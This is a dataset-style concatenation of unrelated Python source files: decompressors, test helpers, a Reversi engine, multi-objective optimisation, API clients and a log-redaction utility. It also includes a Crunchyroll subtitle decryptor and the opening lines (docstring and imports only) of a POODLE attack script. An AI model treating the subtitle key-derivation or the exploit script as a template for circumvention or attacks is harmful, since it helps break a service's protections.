('uv', np.float32, (2,)),
('neg_one', np.int32, (1,)),
]
)
def __init__(self, bsp, lump_id):
super().__init__(bsp, lump_id)
self.vertex_info = np.array([])
def parse(self):
reader = self.reader
self.vertex_info = np.frombuffer(reader.read(), self._dtype)
return self
|
dfvfs/compression/bzip2_decompressor.py | dfjxs/dfvfs | 176 | 12635533 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
"""The BZIP2 decompressor implementation."""
import bz2
from dfvfs.compression import decompressor
from dfvfs.compression import manager
from dfvfs.lib import definitions
from dfvfs.lib import errors
class BZIP2Decompressor(decompressor.Decompressor):
"""BZIP2 decompressor using bz2."""
COMPRESSION_METHOD = definitions.COMPRESSION_METHOD_BZIP2
def __init__(self):
"""Initializes a decompressor."""
super(BZIP2Decompressor, self).__init__()
self._bz2_decompressor = bz2.BZ2Decompressor()
def Decompress(self, compressed_data):
"""Decompresses the compressed data.
Args:
compressed_data (bytes): compressed data.
Returns:
tuple(bytes, bytes): uncompressed data and remaining compressed data.
Raises:
BackEndError: if the BZIP2 compressed stream cannot be decompressed.
"""
try:
uncompressed_data = self._bz2_decompressor.decompress(compressed_data)
remaining_compressed_data = getattr(
self._bz2_decompressor, 'unused_data', b'')
except (EOFError, IOError) as exception:
raise errors.BackEndError((
'Unable to decompress BZIP2 compressed stream with error: '
'{0!s}.').format(exception))
return uncompressed_data, remaining_compressed_data
manager.CompressionManager.RegisterDecompressor(BZIP2Decompressor)
|
tests/protocols/http/twisted_web_test_utils.py | paradiseng/jasmin | 750 | 12635534 | # https://gist.github.com/1873035#file_twisted_web_test_utils.py
import json
from io import StringIO
from twisted.internet.defer import succeed
from twisted.web import server, http_headers
from twisted.web.test.test_web import DummyRequest
from twisted.web.http import Request
class SmartDummyRequest(DummyRequest):
def __init__(self, method, url, args=None, json_data=None, headers=None):
DummyRequest.__init__(self, url.split(b'/'))
self.method = method
self.requestHeaders = http_headers.Headers(headers or {})
# set args
args = args or {}
for k, v in args.items():
if isinstance(k, str):
k = k.encode()
if isinstance(v, str):
v = v.encode()
self.addArg(k, v)
if json_data is not None:
self.content = StringIO(json.dumps(json_data))
else:
self.content = None
def value(self):
return b"".join(self.written)
class DummySite(server.Site):
def get(self, url, args=None):
return self._request(b"GET", url, args)
def post(self, url, args=None, json_data=None, headers=None):
if json_data is not None:
return self._request_json(b"POST", url, json_data, headers=headers)
else:
return self._request(b"POST", url, args, headers=headers)
def _request(self, method, url, args, headers=None):
request = SmartDummyRequest(method, url, args, headers=headers)
resource = self.getResourceFor(request)
result = resource.render(request)
return self._resolveResult(request, result)
def _request_json(self, method, url, json_data, headers=None):
request = SmartDummyRequest(method, url, json_data=json_data, headers=headers)
resource = self.getResourceFor(request)
result = resource.render(request)
return self._resolveResult(request, result)
def _resolveResult(self, request, result):
if isinstance(result, str):
request.write(result.encode())
request.finish()
return succeed(request)
elif isinstance(result, bytes):
request.write(result)
request.finish()
return succeed(request)
elif result is server.NOT_DONE_YET:
if request.finished:
return succeed(request)
else:
return request.notifyFinish().addCallback(lambda _: request)
else:
raise ValueError("Unexpected return value: %r" % (result,))
|
tests/extra/polar.py | aluhrs13/HPI | 1,026 | 12635575 | <gh_stars>1000+
from pathlib import Path
import sys
from importlib import reload
from my.core.common import get_valid_filename
ROOT = Path(__file__).parent.absolute()
OUTPUTS = ROOT / 'outputs'
import pytest # type: ignore
def test_hpi(prepare: str) -> None:
from my.polar import get_entries
assert len(list(get_entries())) > 1
def test_orger(prepare: str, tmp_path: Path) -> None:
from my.core.common import import_from, import_file
om = import_file(ROOT / 'orger/modules/polar.py')
# reload(om)
pv = om.PolarView() # type: ignore
# TODO hmm. worth making public?
OUTPUTS.mkdir(exist_ok=True)
out = OUTPUTS / (get_valid_filename(prepare) + '.org')
pv._run(to=out)
PARAMS = [
# 'data/polar/BojanKV_polar/.polar',
'',
# 'data/polar/TheCedarPrince_KnowledgeRepository',
# 'data/polar/coelias_polardocs',
# 'data/polar/warkdarrior_polar-document-repository'
]
@pytest.fixture(params=PARAMS)
def prepare(request):
dotpolar = request.param
class user_config:
if dotpolar != '': # defaul
polar_dir = Path(ROOT / dotpolar)
defensive = False
import my.config
setattr(my.config, 'polar', user_config)
import my.polar as polar
reload(polar)
# TODO hmm... ok, need to document reload()
yield dotpolar
|
webhook/plugins/base.py | nobgr/xray | 7,086 | 12635580 | import logging
from cached_property import cached_property
from model.plugin import PluginMeta
from model.vuln import Statistics, WebVuln, ServiceVuln
class BasePlugin:
@cached_property
def meta(self) -> PluginMeta:
raise NotImplementedError("you should implement this method in your subclass")
@cached_property
def logger(self):
return logging.getLogger("plugin:" + self.meta.key)
def process_web_vuln(self, instance: str, vuln: WebVuln):
pass
def process_service_vuln(self, instance: str, vuln: ServiceVuln):
pass
def process_statistics(self, instance: str, statistics: Statistics):
pass
|
chocolate/mo/__init__.py | Intelecy/chocolate | 105 | 12635621 | from collections import defaultdict
import numpy
try:
# try importing the C version and set docstring
from .hv import hypervolume as __hv
except ImportError:
# fallback on python version
from .pyhv import hypervolume as __hv
def argsortNondominated(losses, k, first_front_only=False):
"""Sort input in Pareto-equal groups.
Sort the first *k* *losses* into different nondomination levels
using the "Fast Nondominated Sorting Approach" proposed by Deb et al.,
see [Deb2002]_. This algorithm has a time complexity of :math:`O(MN^2)`,
where :math:`M` is the number of objectives and :math:`N` the number of
losses.
:param losses: A list of losses to select from.
:param k: The number of elements to select.
:param first_front_only: If :obj:`True` sort only the first front and
exit.
:returns: A list of Pareto fronts (lists) containing the losses
index.
.. [Deb2002] Deb, Pratab, Agarwal, and Meyarivan, "A fast elitist
non-dominated sorting genetic algorithm for multi-objective
optimization: NSGA-II", 2002.
"""
if k == 0:
return []
loss2c = defaultdict(list)
for i, c in enumerate(losses):
loss2c[tuple(c)].append(i)
losses_keys = list(loss2c.keys())
current_front = []
next_front = []
dominating_losses = defaultdict(int)
dominated_losses = defaultdict(list)
# Rank first Pareto front
for i, li in enumerate(losses_keys):
for lj in losses_keys[i+1:]:
if dominates(li, lj):
dominating_losses[lj] += 1
dominated_losses[li].append(lj)
elif dominates(lj, li):
dominating_losses[li] += 1
dominated_losses[lj].append(li)
if dominating_losses[li] == 0:
current_front.append(li)
fronts = [[]]
for loss in current_front:
fronts[0].extend(loss2c[loss])
pareto_sorted = len(fronts[0])
if first_front_only:
return fronts[0]
# Rank the next front until at least the requested number
# candidates are sorted
N = min(len(losses), k)
while pareto_sorted < N:
fronts.append([])
for lp in current_front:
for ld in dominated_losses[lp]:
dominating_losses[ld] -= 1
if dominating_losses[ld] == 0:
next_front.append(ld)
pareto_sorted += len(loss2c[ld])
fronts[-1].extend(loss2c[ld])
current_front = next_front
next_front = []
return fronts
def dominates(loss1, loss2, obj=slice(None)):
"""Returns wether or not loss1 dominates loss2, while minimizing all
objectives.
"""
not_equal = False
for l1i, l2i in zip(loss1[obj], loss2[obj]):
if l1i < l2i:
not_equal = True
elif l1i > l2i:
return False
return not_equal
def hypervolume(pointset, ref):
"""Computes the hypervolume of a point set.
Args:
pointset: A list of points.
ref: The origin from which to comute the hypervolume.
This value should be larger than all values in the
point set.
Returns:
The hypervolume of this point set.
"""
return __hv(pointset, ref)
def hypervolume_indicator(front, **kargs):
"""Indicator function using the hypervolume value.
Computes the contribution of each of the front candidates to the
front hypervolume. The hypervolume indicator assumes minimization.
Args:
front: A list of Pareto equal candidate solutions.
ref: The origin from which to compute the hypervolume (optional).
If not given, ref is set to the maximum value in each dimension + 1.
Returns:
The index of the least contributing candidate.
"""
# Hypervolume use implicit minimization
obj = numpy.array(front)
ref = kargs.get("ref", None)
if ref is None:
ref = numpy.max(obj, axis=0) + 1
def contribution(i):
# The contribution of point p_i in point set P
# is the hypervolume of P without p_i
return hypervolume(numpy.concatenate((obj[:i], obj[i+1:])), ref)
contrib_values = map(contribution, range(len(front)))
# Select the maximum hypervolume value (correspond to the minimum difference)
return numpy.argmax(contrib_values) |
docs/release/changelog.py | oneconvergence/katib | 1,177 | 12635644 | from github import Github
import argparse
REPO_NAME = "kubeflow/katib"
CHANGELOG_FILE = "CHANGELOG.md"
parser = argparse.ArgumentParser()
parser.add_argument("--token", type=str, help="GitHub Access Token")
parser.add_argument("--range", type=str, help="Changelog is generated for this release range")
args = parser.parse_args()
if args.token is None:
raise Exception("GitHub Token must be set")
try:
previous_release = args.range.split("..")[0]
current_release = args.range.split("..")[1]
except Exception:
raise Exception("Release range must be set in this format: v0.11.0..v0.12.0")
# Get list of commits from the range.
github_repo = Github(args.token).get_repo(REPO_NAME)
comparison = github_repo.compare(previous_release, current_release)
commits = comparison.commits
# The latest commit contains the release date.
release_date = str(commits[-1].commit.author.date).split(" ")[0]
release_url = "https://github.com/{}/tree/{}".format(REPO_NAME, current_release)
# Get all PRs in reverse chronological order from the commits.
pr_list = ""
pr_set = set()
for commit in reversed(commits):
# Only add commits with PRs.
for pr in commit.get_pulls():
# Each PR is added only one time to the list.
if pr.number in pr_set:
continue
pr_set.add(pr.number)
new_pr = "- {title} ([#{id}]({pr_link}) by [@{user_id}]({user_url}))\n".format(
title=pr.title,
id=pr.number,
pr_link=pr.html_url,
user_id=pr.user.login,
user_url=pr.user.html_url
)
pr_list += new_pr
change_log = [
"# Changelog"
"\n\n",
"## [{}]({}) ({})".format(current_release, release_url, release_date),
"\n\n",
"## TODO: Group PRs into Features, Bug fixes, Documentation, etc. " +
"For example: [v0.11.0](https://github.com/kubeflow/katib/releases/tag/v0.11.0)",
"\n\n",
pr_list,
"\n"
"[Full Changelog]({})\n".format(comparison.html_url)]
# Update Changelog with the new changes.
with open(CHANGELOG_FILE, "r+") as f:
lines = f.readlines()
f.seek(0)
lines = lines[0:0] + change_log + lines[1:]
f.writelines(lines)
print("Changelog has been updated\n")
print("Group PRs in the Changelog into Features, Bug fixes, Documentation, etc.\n")
print("After that, submit a PR with the updated Changelog")
|
mahotas/tests/test_freeimage.py | odidev/mahotas | 541 | 12635646 | import numpy as np
from os import path
try:
from mahotas.io import freeimage
except OSError:
import pytest
pytestmark = pytest.mark.skip
def test_freeimage(tmpdir):
img = np.arange(256).reshape((16,16)).astype(np.uint8)
fname = tmpdir.join('mahotas_test.png')
freeimage.imsave(fname, img)
img_ = freeimage.imread(fname)
assert img.shape == img_.shape
assert np.all(img == img_)
def test_as_grey(tmpdir):
fname = tmpdir.join('mahotas_test.png')
colour = np.arange(16*16*3).reshape((16,16,3))
freeimage.imsave(fname, colour.astype(np.uint8))
c2 = freeimage.imread(fname, as_grey=True)
assert len(c2.shape) == 2
assert c2.shape == colour.shape[:-1]
def test_rgba():
rgba = path.join(
path.dirname(__file__),
'data',
'rgba.png')
rgba = freeimage.imread(rgba)
assert np.all(np.diff(rgba[:,:,3].mean(1)) < 0 ) # the image contains an alpha gradient
def test_save_load_rgba(tmpdir):
fname = tmpdir.join('mahotas_test.png')
img = np.arange(256).reshape((8,8,4)).astype(np.uint8)
freeimage.imsave(fname, img)
img_ = freeimage.imread(fname)
assert img.shape == img_.shape
assert np.all(img == img_)
def test_fromblob():
img = np.arange(100, dtype=np.uint8).reshape((10,10))
s = freeimage.imsavetoblob(img, 't.png')
assert np.all(freeimage.imreadfromblob(s) == img)
s = freeimage.imsavetoblob(img, 't.bmp')
assert np.all(freeimage.imreadfromblob(s) == img)
def test_1bpp():
bpp = path.join(
path.dirname(__file__),
'data',
'1bpp.bmp')
bpp = freeimage.imread(bpp)
assert bpp.sum()
assert bpp.sum() < bpp.size
def test_multi(tmpdir):
testtif = tmpdir.join('/mahotas_test.tif')
f = np.zeros((16,16), np.uint8)
fs = []
for t in range(8):
f[:t,:t] = t
fs.append(f.copy())
freeimage.write_multipage(fs, testtif)
fs2 = freeimage.read_multipage(testtif)
for f,f2 in zip(fs,fs2):
assert np.all(f == f2)
def test_uint16(tmpdir):
img = np.zeros((32,32), dtype=np.uint16)
fname = tmpdir.join('mahotas_test.png')
freeimage.imsave(fname, img)
img_ = freeimage.imread(fname)
assert img.shape == img_.shape
assert img.dtype == img_.dtype
assert np.all(img == img_)
|
tests/strings/string_format_i.py | MoonStarCZW/py2rb | 124 | 12635651 |
a = 1.123456
b = 10
c = -30
d = 34
e = 123.456
f = 19892122
# form 0
s = "b=%i" % b
print(s)
# form 1
s = "b,c,d=%i+%i+%i" % (b,c,d)
print(s)
# form 2
s = "b=%(b)i and c=%(c)i and d=%(d)i" % { 'b':b,'c':c,'d':d }
print(s)
# width,flags
s = "e=%020i e=%+i e=%20i e=%-20i (e=%- 20i)" % (e,e,e,e,e)
print(s)
|
人工智能/AI_Reversi/board.py | yunwei37/ZJU-CS-GIS-ClassNotes | 397 | 12635654 | #!/usr/bin/Anaconda3/python
# -*- coding: utf-8 -*-
class Board(object):
"""
Board 黑白棋棋盘,规格是8*8,黑棋用 X 表示,白棋用 O 表示,未落子时用 . 表示。
"""
def __init__(self):
"""
初始化棋盘状态
"""
self.empty = '.' # 未落子状态
self._board = [[self.empty for _ in range(8)] for _ in range(8)] # 规格:8*8
self._board[3][4] = 'X' # 黑棋棋子
self._board[4][3] = 'X' # 黑棋棋子
self._board[3][3], self._board[4][4] = 'O', 'O' # 白棋棋子
def __getitem__(self, index):
"""
添加Board[][] 索引语法
:param index: 下标索引
:return:
"""
return self._board[index]
def display(self, step_time=None, total_time=None):
"""
打印棋盘
:param step_time: 每一步的耗时, 比如:{"X":1,"O":0},默认值是None
:param total_time: 总耗时, 比如:{"X":1,"O":0},默认值是None
:return:
"""
board = self._board
# print(step_time,total_time)
# 打印列名
print(' ', ' '.join(list('ABCDEFGH')))
# 打印行名和棋盘
for i in range(8):
# print(board)
print(str(i + 1), ' '.join(board[i]))
if (not step_time) or (not total_time):
# 棋盘初始化时展示的时间
step_time = {"X": 0, "O": 0}
total_time = {"X": 0, "O": 0}
print("统计棋局: 棋子总数 / 每一步耗时 / 总时间 ")
print("黑 棋: " + str(self.count('X')) + ' / ' + str(step_time['X']) + ' / ' + str(
total_time['X']))
print("白 棋: " + str(self.count('O')) + ' / ' + str(step_time['O']) + ' / ' + str(
total_time['O']) + '\n')
else:
# 比赛时展示时间
print("统计棋局: 棋子总数 / 每一步耗时 / 总时间 ")
print("黑 棋: " + str(self.count('X')) + ' / ' + str(step_time['X']) + ' / ' + str(
total_time['X']))
print("白 棋: " + str(self.count('O')) + ' / ' + str(step_time['O']) + ' / ' + str(
total_time['O']) + '\n')
def count(self, color):
"""
统计 color 一方棋子的数量。(O:白棋, X:黑棋, .:未落子状态)
:param color: [O,X,.] 表示棋盘上不同的棋子
:return: 返回 color 棋子在棋盘上的总数
"""
count = 0
for y in range(8):
for x in range(8):
if self._board[x][y] == color:
count += 1
return count
def get_winner(self):
"""
判断黑棋和白旗的输赢,通过棋子的个数进行判断
:return: 0-黑棋赢,1-白旗赢,2-表示平局,黑棋个数和白旗个数相等
"""
# 定义黑白棋子初始的个数
black_count, white_count = 0, 0
for i in range(8):
for j in range(8):
# 统计黑棋棋子的个数
if self._board[i][j] == 'X':
black_count += 1
# 统计白旗棋子的个数
if self._board[i][j] == 'O':
white_count += 1
if black_count > white_count:
# 黑棋胜
return 0, black_count - white_count
elif black_count < white_count:
# 白棋胜
return 1, white_count - black_count
elif black_count == white_count:
# 表示平局,黑棋个数和白旗个数相等
return 2, 0
def _move(self, action, color):
"""
落子并获取反转棋子的坐标
:param action: 落子的坐标 可以是 D3 也可以是(2,3)
:param color: [O,X,.] 表示棋盘上不同的棋子
:return: 返回反转棋子的坐标列表,落子失败则返回False
"""
# 判断action 是不是字符串,如果是则转化为数字坐标
if isinstance(action, str):
action = self.board_num(action)
fliped = self._can_fliped(action, color)
if fliped:
# 有就反转对方棋子坐标
for flip in fliped:
x, y = self.board_num(flip)
self._board[x][y] = color
# 落子坐标
x, y = action
# 更改棋盘上 action 坐标处的状态,修改之后该位置属于 color[X,O,.]等三状态
self._board[x][y] = color
return fliped
else:
# 没有反转子则落子失败
return False
def backpropagation(self, action, flipped_pos, color):
"""
回溯
:param action: 落子点的坐标
:param flipped_pos: 反转棋子坐标列表
:param color: 棋子的属性,[X,0,.]三种情况
:return:
"""
# 判断action 是不是字符串,如果是则转化为数字坐标
if isinstance(action, str):
action = self.board_num(action)
self._board[action[0]][action[1]] = self.empty
# 如果 color == 'X',则 op_color = 'O';否则 op_color = 'X'
op_color = "O" if color == "X" else "X"
for p in flipped_pos:
# 判断action 是不是字符串,如果是则转化为数字坐标
if isinstance(p, str):
p = self.board_num(p)
self._board[p[0]][p[1]] = op_color
def is_on_board(self, x, y):
"""
判断坐标是否出界
:param x: row 行坐标
:param y: col 列坐标
:return: True or False
"""
return x >= 0 and x <= 7 and y >= 0 and y <= 7
def _can_fliped(self, action, color):
"""
检测落子是否合法,如果不合法,返回 False,否则返回反转子的坐标列表
:param action: 下子位置
:param color: [X,0,.] 棋子状态
:return: False or 反转对方棋子的坐标列表
"""
# 判断action 是不是字符串,如果是则转化为数字坐标
if isinstance(action, str):
action = self.board_num(action)
xstart, ystart = action
# 如果该位置已经有棋子或者出界,返回 False
if not self.is_on_board(xstart, ystart) or self._board[xstart][ystart] != self.empty:
return False
# 临时将color放到指定位置
self._board[xstart][ystart] = color
# 棋手
op_color = "O" if color == "X" else "X"
# 要被翻转的棋子
flipped_pos = []
flipped_pos_board = []
for xdirection, ydirection in [[0, 1], [1, 1], [1, 0], [1, -1], [0, -1], [-1, -1], [-1, 0],
[-1, 1]]:
x, y = xstart, ystart
x += xdirection
y += ydirection
# 如果(x,y)在棋盘上,而且为对方棋子,则在这个方向上继续前进,否则循环下一个角度。
if self.is_on_board(x, y) and self._board[x][y] == op_color:
x += xdirection
y += ydirection
# 进一步判断点(x,y)是否在棋盘上,如果不在棋盘上,继续循环下一个角度,如果在棋盘上,则进行while循环。
if not self.is_on_board(x, y):
continue
# 一直走到出界或不是对方棋子的位置
while self._board[x][y] == op_color:
# 如果一直是对方的棋子,则点(x,y)一直循环,直至点(x,y)出界或者不是对方的棋子。
x += xdirection
y += ydirection
# 点(x,y)出界了和不是对方棋子
if not self.is_on_board(x, y):
break
# 出界了,则没有棋子要翻转OXXXXX
if not self.is_on_board(x, y):
continue
# 是自己的棋子OXXXXXXO
if self._board[x][y] == color:
while True:
x -= xdirection
y -= ydirection
# 回到了起点则结束
if x == xstart and y == ystart:
break
# 需要翻转的棋子
flipped_pos.append([x, y])
# 将前面临时放上的棋子去掉,即还原棋盘
self._board[xstart][ystart] = self.empty # restore the empty space
# 没有要被翻转的棋子,则走法非法。返回 False
if len(flipped_pos) == 0:
return False
for fp in flipped_pos:
flipped_pos_board.append(self.num_board(fp))
# 走法正常,返回翻转棋子的棋盘坐标
return flipped_pos_board
def get_legal_actions(self, color):
"""
按照黑白棋的规则获取棋子的合法走法
:param color: 不同颜色的棋子,X-黑棋,O-白棋
:return: 生成合法的落子坐标,用list()方法可以获取所有的合法坐标
"""
# 表示棋盘坐标点的8个不同方向坐标,比如方向坐标[0][1]则表示坐标点的正上方。
direction = [(-1, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1)]
op_color = "O" if color == "X" else "X"
# 统计 op_color 一方邻近的未落子状态的位置
op_color_near_points = []
board = self._board
for i in range(8):
# i 是行数,从0开始,j是列数,也是从0开始
for j in range(8):
# 判断棋盘[i][j]位子棋子的属性,如果是op_color,则继续进行下一步操作,
# 否则继续循环获取下一个坐标棋子的属性
if board[i][j] == op_color:
# dx,dy 分别表示[i][j]坐标在行、列方向上的步长,direction 表示方向坐标
for dx, dy in direction:
x, y = i + dx, j + dy
# 表示x、y坐标值在合理范围,棋盘坐标点board[x][y]为未落子状态,
# 而且(x,y)不在op_color_near_points 中,统计对方未落子状态位置的列表才可以添加该坐标点
if 0 <= x <= 7 and 0 <= y <= 7 and board[x][y] == self.empty and (
x, y) not in op_color_near_points:
op_color_near_points.append((x, y))
l = [0, 1, 2, 3, 4, 5, 6, 7]
for p in op_color_near_points:
if self._can_fliped(p, color):
# 判断p是不是数字坐标,如果是则返回棋盘坐标
# p = self.board_num(p)
if p[0] in l and p[1] in l:
p = self.num_board(p)
yield p
def board_num(self, action):
"""
棋盘坐标转化为数字坐标
:param action:棋盘坐标,比如A1
:return:数字坐标,比如 A1 --->(0,0)
"""
row, col = str(action[1]).upper(), str(action[0]).upper()
if row in '12345678' and col in 'ABCDEFGH':
# 坐标正确
x, y = '12345678'.index(row), 'ABCDEFGH'.index(col)
return x, y
def num_board(self, action):
"""
数字坐标转化为棋盘坐标
:param action:数字坐标 ,比如(0,0)
:return:棋盘坐标,比如 (0,0)---> A1
"""
row, col = action
l = [0, 1, 2, 3, 4, 5, 6, 7]
if col in l and row in l:
return chr(ord('A') + col) + str(row + 1)
# # # 测试
# if __name__ == '__main__':
# board = Board() # 棋盘初始化
# board.display()
# print("----------------------------------X",list(board.get_legal_actions('X')))
# # print("打印D2放置为X",board._move('D2','X'))
# print("==========",'F1' in list(board.get_legal_actions('X')))
# # print('E2' in list(board.get_legal_actions('X')))
|
pipe-cli/src/api/folder.py | msleprosy/cloud-pipeline | 126 | 12635660 | <reponame>msleprosy/cloud-pipeline
# Copyright 2017-2019 EPAM Systems, Inc. (https://www.epam.com/)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .base import API
from ..model.folder_model import FolderModel
class Folder(API):
def __init__(self):
super(Folder, self).__init__()
@classmethod
def load_tree(cls):
api = cls.instance()
response_data = api.call('/folder/loadTree', None)
return FolderModel.load(response_data['payload'])
@classmethod
def load(cls, identifier):
api = cls.instance()
response_data = api.call('/folder/find?id={}'.format(identifier), None)
return FolderModel.load(response_data['payload'])
@classmethod
def load_by_name(cls, dir_name):
folder = cls.load_tree()
directory = cls.search_tree(folder, dir_name)
if directory is not None:
api = cls.instance()
response_data = api.call('/folder/{}/load'.format(directory.id), None)
return FolderModel.load(response_data['payload'])
@classmethod
def search_tree(cls, folder, dir_name):
dirs = cls.collect_dirs(None, folder)
for directory in dirs:
if directory.name == dir_name:
return directory
@classmethod
def collect_dirs(cls, dirs, folder):
if dirs is None:
dirs = []
for child in folder.child_folders:
dirs.append(child)
cls.collect_dirs(dirs, child)
return dirs
|
Algo and DSA/LeetCode-Solutions-master/Python/sort-features-by-popularity.py | Sourav692/FAANG-Interview-Preparation | 3,269 | 12635675 | # Time: O(nlogn)
# Space: O(n)
import collections
class Solution(object):
def sortFeatures(self, features, responses):
"""
:type features: List[str]
:type responses: List[str]
:rtype: List[str]
"""
features_set = set(features)
order = {word: i for i, word in enumerate(features)}
freq = collections.defaultdict(int)
for r in responses:
for word in set(r.split(' ')):
if word in features_set:
freq[word] += 1
features.sort(key=lambda x: (-freq[x], order[x]))
return features
|
anime_dl/sites/supporters/sub_fetcher.py | tiagotda/anime-dl | 246 | 12635678 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import anime_dl.common
from anime_dl.external.aes import aes_cbc_decrypt
from anime_dl.external.compat import compat_etree_fromstring
from anime_dl.external.utils import bytes_to_intlist, intlist_to_bytes
import re
import logging
import os
import base64
import zlib
from hashlib import sha1
from math import pow, sqrt, floor
def crunchyroll_subs(xml, episode_number, file_name):
headers = {
'User-Agent':
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7',
'Referer':
'https://www.crunchyroll.com'
}
for sub_id, sub_lang, sub_lang2 in re.findall(
r'subtitle_script_id\=(.*?)\"\ title\=\"\[(.*?)\]\ (.*?)\"',
str(xml)):
xml_return = anime_dl.common.browser_instance.page_downloader(url="http://www.crunchyroll.com/xml/?req=RpcApiSubtitle_GetXml&subtitle_script_id={0}".format(sub_id), headers=headers)
iv = str(re.search(r'\<iv\>(.*?)\<\/iv\>', str(xml_return)).group(1)).strip()
data = str(re.search(r'\<data\>(.*?)\<\/data\>', str(xml_return)).group(1)).strip()
subtitle = _decrypt_subtitles(data, iv, sub_id).decode('utf-8')
sub_root = compat_etree_fromstring(subtitle)
sub_data = _convert_subtitles_to_ass(sub_root)
lang_code = str(
re.search(r'lang_code\=\"(.*?)\"', str(subtitle)).group(
1)).strip()
sub_file_name = str(file_name).replace(".mp4", ".") + str(lang_code) + ".ass"
print("Downloading {0} ...".format(sub_file_name))
try:
with open(str(os.getcwd()) + "/" + str(sub_file_name), "wb") as sub_file:
sub_file.write(sub_data.encode("utf-8"))
except Exception as EncodingException:
print("Couldn't write the subtitle file...skipping.")
pass
logging.debug("\n----- Subs Downloaded -----\n")
return True
def _decrypt_subtitles(data, iv, id):
data = bytes_to_intlist(base64.b64decode(data.encode('utf-8')))
iv = bytes_to_intlist(base64.b64decode(iv.encode('utf-8')))
id = int(id)
def obfuscate_key_aux(count, modulo, start):
output = list(start)
for _ in range(count):
output.append(output[-1] + output[-2])
# cut off start values
output = output[2:]
output = list(map(lambda x: x % modulo + 33, output))
return output
def obfuscate_key(key):
num1 = int(floor(pow(2, 25) * sqrt(6.9)))
num2 = (num1 ^ key) << 5
num3 = key ^ num1
num4 = num3 ^ (num3 >> 3) ^ num2
prefix = intlist_to_bytes(obfuscate_key_aux(20, 97, (1, 2)))
shaHash = bytes_to_intlist(
sha1(prefix + str(num4).encode('ascii')).digest())
# Extend 160 Bit hash to 256 Bit
return shaHash + [0] * 12
key = obfuscate_key(id)
decrypted_data = intlist_to_bytes(aes_cbc_decrypt(data, key, iv))
return zlib.decompress(decrypted_data)
def _convert_subtitles_to_ass(sub_root):
output = ''
def ass_bool(strvalue):
assvalue = '0'
if strvalue == '1':
assvalue = '-1'
return assvalue
output = '[Script Info]\n'
output += 'Title: %s\n' % sub_root.attrib['title']
output += 'ScriptType: v4.00+\n'
output += 'WrapStyle: %s\n' % sub_root.attrib['wrap_style']
output += 'PlayResX: %s\n' % sub_root.attrib['play_res_x']
output += 'PlayResY: %s\n' % sub_root.attrib['play_res_y']
output += """
[V4+ Styles]
Format: Name, Fontname, Fontsize, PrimaryColour, SecondaryColour, OutlineColour, BackColour, Bold, Italic, Underline, StrikeOut, ScaleX, ScaleY, Spacing, Angle, BorderStyle, Outline, Shadow, Alignment, MarginL, MarginR, MarginV, Encoding
"""
for style in sub_root.findall('./styles/style'):
output += 'Style: ' + style.attrib['name']
output += ',' + style.attrib['font_name']
output += ',' + style.attrib['font_size']
output += ',' + style.attrib['primary_colour']
output += ',' + style.attrib['secondary_colour']
output += ',' + style.attrib['outline_colour']
output += ',' + style.attrib['back_colour']
output += ',' + ass_bool(style.attrib['bold'])
output += ',' + ass_bool(style.attrib['italic'])
output += ',' + ass_bool(style.attrib['underline'])
output += ',' + ass_bool(style.attrib['strikeout'])
output += ',' + style.attrib['scale_x']
output += ',' + style.attrib['scale_y']
output += ',' + style.attrib['spacing']
output += ',' + style.attrib['angle']
output += ',' + style.attrib['border_style']
output += ',' + style.attrib['outline']
output += ',' + style.attrib['shadow']
output += ',' + style.attrib['alignment']
output += ',' + style.attrib['margin_l']
output += ',' + style.attrib['margin_r']
output += ',' + style.attrib['margin_v']
output += ',' + style.attrib['encoding']
output += '\n'
output += """
[Events]
Format: Layer, Start, End, Style, Name, MarginL, MarginR, MarginV, Effect, Text
"""
for event in sub_root.findall('./events/event'):
output += 'Dialogue: 0'
output += ',' + event.attrib['start']
output += ',' + event.attrib['end']
output += ',' + event.attrib['style']
output += ',' + event.attrib['name']
output += ',' + event.attrib['margin_l']
output += ',' + event.attrib['margin_r']
output += ',' + event.attrib['margin_v']
output += ',' + event.attrib['effect']
output += ',' + event.attrib['text']
output += '\n'
return output
|
src/oic/utils/sanitize.py | kschu91/pyoidc | 373 | 12635710 | <filename>src/oic/utils/sanitize.py
import re
from collections.abc import Mapping
from textwrap import dedent
SENSITIVE_THINGS = {
"password",
"<PASSWORD>",
"client_secret",
"code",
"authorization",
"access_token",
"refresh_token",
}
REPLACEMENT = "<REDACTED>"
SANITIZE_PATTERN = r"""
(?<!_) # Negative-lookbehind for underscore.
# Necessary to keep 'authorization_code' from matching 'code'
( # Start of capturing group--we'll keep this bit.
(?: # non-capturing group
{} # Template-in things we want to sanitize
) #
['\"]? # Might have a quote after them?
\s* # Maybe some whitespace
[=:,] # Probably a : , or = in tuple, dict or qs format
\s* # Maybe more whitespace
[([]? # Could be inside a list/tuple, parse_qs?
([bu][\"'])? # Python 2
[\"']? # Might be a quote here.
) # End of capturing group
(?:[%=/+\w]+) # This is the bit we replace with '<REDACTED>'
"""
SANITIZE_PATTERN = dedent(SANITIZE_PATTERN.format("|".join(SENSITIVE_THINGS)))
SANITIZE_REGEX = re.compile(SANITIZE_PATTERN, re.VERBOSE | re.IGNORECASE | re.UNICODE)
def redacted(key, value):
if key in SENSITIVE_THINGS:
return (key, REPLACEMENT)
return (key, value)
def sanitize(potentially_sensitive):
if isinstance(potentially_sensitive, Mapping):
# Makes new dict so we don't modify the original
# Also case-insensitive--possibly important for HTTP headers.
return dict(redacted(k.lower(), v) for k, v in potentially_sensitive.items())
else:
if not isinstance(potentially_sensitive, str):
potentially_sensitive = str(potentially_sensitive)
return SANITIZE_REGEX.sub(r"\1{}".format(REPLACEMENT), potentially_sensitive)
|
poodle-exploit.py | RootDev4/POODLE-PoC | 207 | 12635731 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Poodle attack implementation
Author: mpgn <<EMAIL>>
Created: 03/2018 - Python3
License: MIT
'''
import argparse
import binascii
import os
import re
import select
import socket
import socketserver
